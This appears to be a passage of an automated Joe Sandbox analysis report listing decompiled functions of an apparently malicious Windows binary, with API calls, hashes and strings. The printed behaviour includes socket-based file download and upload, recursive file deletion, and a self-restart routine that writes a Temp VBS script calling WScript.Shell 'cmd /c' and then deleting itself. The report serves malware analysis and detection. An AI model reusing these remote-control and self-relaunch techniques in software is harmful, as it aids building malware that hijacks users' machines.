                                                  • Part of subcall function 00403392: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004033CA
                                                  • Part of subcall function 00403392: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004033D3
                                                  • Part of subcall function 00403392: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004033F6
                                                  • Part of subcall function 00403392: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403403
                                                  • Part of subcall function 00403392: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040340F
                                                  • Part of subcall function 00403392: recv.WS2_32(?,?,0000FDE8,00000000), ref: 00403435
                                                  • Part of subcall function 00403392: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,?,?,0000FDE8,00000000), ref: 00403452
                                                  • Part of subcall function 00403392: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040345F
                                                  • Part of subcall function 00403392: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403474
                                                  • Part of subcall function 00403392: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 00403482
                                                  • Part of subcall function 00403392: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?), ref: 0040349A
                                                  • Part of subcall function 00403392: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004034D1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CC8D
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CC97
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CCA1
                                                  • Part of subcall function 004118F7: CreateFileW.KERNEL32(6C9BB310,40000000,00000000,00000000,00000002,00000080,00000000,004137F0,6C9BB310), ref: 00411934
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCB6
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CCE8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CCF5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CD09
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CD15
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CD2A
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60([INFO],?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023CA
                                                  • Part of subcall function 004023C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023E3
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023EE
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023FB
                                                  • Part of subcall function 004023C0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040240D
                                                  • Part of subcall function 004023C0: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402418
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402427
                                                  • Part of subcall function 004023C0: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402431
                                                  • Part of subcall function 004023C0: send.WS2_32(?,00000000), ref: 0040243B
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402492
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040249B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CD67
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CD78
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CD8C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CD98
                                                • closesocket.WS2_32(00000000), ref: 0040CD9F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DB59
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@2@@0@V?$basic_string@$G@2@@std@@G@std@@Hstd@@$D@1@@$?c_str@?$basic_string@$?length@?$basic_string@V01@@V10@0@$V10@@$V01@$?begin@?$basic_string@?empty@?$basic_string@?size@?$basic_string@A?$basic_string@V10@Y?$basic_string@closesocket$??2@??4?$basic_string@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@CreateFileG@1@@LocalTimeV12@atoiconnectprintfrecvsendsocket
                                                • String ID: Downloaded file: $Downloading file: $Failed to download file: $[ERROR]$[INFO]
                                                • API String ID: 2388945964-443951226
                                                • Opcode ID: c28a6256352649894b7e059b358dac71b3b984875bbeaa8f75105b1ff1592f31
                                                • Instruction ID: e8c415dd5cfb39da6f5ec30066b28b1e249f341bcce9b26bb1a66faa95a0ee01
                                                • Opcode Fuzzy Hash: c28a6256352649894b7e059b358dac71b3b984875bbeaa8f75105b1ff1592f31
                                                • Instruction Fuzzy Hash: A46154B2900119ABDB04BBA1DD4ADFF773CEB14305F0045AEF506E20A1EE385B448B69
                                                Function 00407F31 Relevance: 63.1, APIs: 29, Strings: 7, Instructions: 134COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A109: TerminateProcess.KERNEL32(00000000,00000001,0040771D,00419BC8,6C9BAFB0,00000001), ref: 0040A119
                                                  • Part of subcall function 0040A109: WaitForSingleObject.KERNEL32(000000FF), ref: 0040A12C
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00407F48
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407F51
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,00000208,00000000), ref: 00407F6F
                                                  • Part of subcall function 0040A9EF: RegOpenKeyExA.ADVAPI32(80000001,00407880,00000000,00020019,00407880), ref: 0040AA09
                                                  • Part of subcall function 0040A9EF: RegQueryValueExA.ADVAPI32(00407880,?,00000000,00000000,?,?,00000208), ref: 0040AA25
                                                  • Part of subcall function 0040A9EF: RegCloseKey.ADVAPI32(00407880), ref: 0040AA30
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00407F92
                                                • _wgetenv.MSVCRT ref: 00407FA6
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00407FB1
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407FBC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407FC7
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00407FD4
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041417C), ref: 00407FEB
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408005
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408010
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040801D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040802A
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408036
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040803F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408048
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408051
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040805A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408063
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408071
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040807B
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408085
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408091
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 004080AF
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004080BC
                                                • exit.MSVCRT ref: 004080C8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004080D1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004080DA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                                • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$EXEpath$Temp$\restart.vbs$open
                                                • API String ID: 864010295-4180105237
                                                • Opcode ID: 6f1963485c5031096f3f15ee8cf2af56c53296f010a98b0800f9df22f355fc11
                                                • Instruction ID: 009f9f871ec5401263e58cc18b3d2d61739dc010462bfa9fbe52de67a4c43b8b
                                                • Opcode Fuzzy Hash: 6f1963485c5031096f3f15ee8cf2af56c53296f010a98b0800f9df22f355fc11
                                                • Instruction Fuzzy Hash: 9F41FF72900119AFCB04EFA0ED59DEE7B7CEB54306B1041BAF506E20A1EF745B49CB69
                                                Function 0040CDAC Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 174fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 0040CDCC
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040CDD6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040CDE2
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040CDEB
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040CDF2
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040CDFF
                                                  • Part of subcall function 0041178F: wcscpy.MSVCRT ref: 004117AB
                                                  • Part of subcall function 0041178F: wcscat.MSVCRT ref: 004117BF
                                                  • Part of subcall function 0041178F: wcscpy.MSVCRT ref: 004117CB
                                                  • Part of subcall function 0041178F: wcscat.MSVCRT ref: 004117D9
                                                  • Part of subcall function 0041178F: FindFirstFileW.KERNEL32(?,?), ref: 004117EC
                                                  • Part of subcall function 0041178F: wcscpy.MSVCRT ref: 0041180C
                                                  • Part of subcall function 0041178F: FindNextFileW.KERNEL32(?,?), ref: 00411824
                                                  • Part of subcall function 0041178F: wcscat.MSVCRT ref: 00411855
                                                  • Part of subcall function 0041178F: RemoveDirectoryW.KERNEL32(?), ref: 0041187A
                                                  • Part of subcall function 0041178F: wcscpy.MSVCRT ref: 0041188A
                                                  • Part of subcall function 0041178F: FindClose.KERNEL32(?), ref: 004118DA
                                                  • Part of subcall function 0041178F: RemoveDirectoryW.KERNEL32(?), ref: 004118E3
                                                  • Part of subcall function 004113BA: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113C5
                                                  • Part of subcall function 004113BA: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113D1
                                                  • Part of subcall function 004113BA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113DB
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040CE0E
                                                • DeleteFileW.KERNEL32(00000000), ref: 0040CE15
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 0040CE3F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 0040CE50
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,?,00000000,?,?,?,?), ref: 0040CE8D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000055), ref: 0040CEB1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CEBD
                                                  • Part of subcall function 0041135A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                  • Part of subcall function 0041135A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                  • Part of subcall function 0041135A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?), ref: 0040CEDE
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?), ref: 0040CEEF
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF03
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,004135D8), ref: 0040CF19
                                                • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6C995E08), ref: 0040CF35
                                                • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 0040CF40
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A), ref: 0040CF53
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040CF5F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF6B
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040CF7D
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040CF86
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040CF9C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
